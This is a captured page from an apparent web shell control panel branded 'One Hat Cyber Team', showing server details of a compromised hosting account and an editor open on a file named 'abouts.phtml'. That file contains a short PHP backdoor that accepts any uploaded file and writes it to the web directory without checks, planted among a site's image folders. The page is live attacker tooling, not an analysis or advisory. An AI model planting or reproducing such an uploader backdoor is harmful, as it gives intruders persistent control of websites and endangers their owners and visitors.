One Hat Cyber Team
Your IP :
216.73.216.1
Server IP :
27.254.111.200
Server :
Linux wh-sh59.csloxinfo.com 3.10.0-693.5.2.el7.x86_64 #1 SMP Fri Oct 20 20:32:50 UTC 2017 x86_64
Server Software :
Apache
PHP Version :
5.5.38
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
vhosts
/
oakwine.co.th
/
httpdocs
/
src
/
file
/
Slide
/
image
/
Edit File:
abouts.phtml
<?php echo '<form method="post" enctype="multipart/form-data">';echo '<input type="file" name="file"><input name="_upl" type="submit" id="_upl"value=">"></form>'; if($_POST['_upl']==">"){echo "ul ok";if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo 's';}else{echo 'f';}}?>
Simpan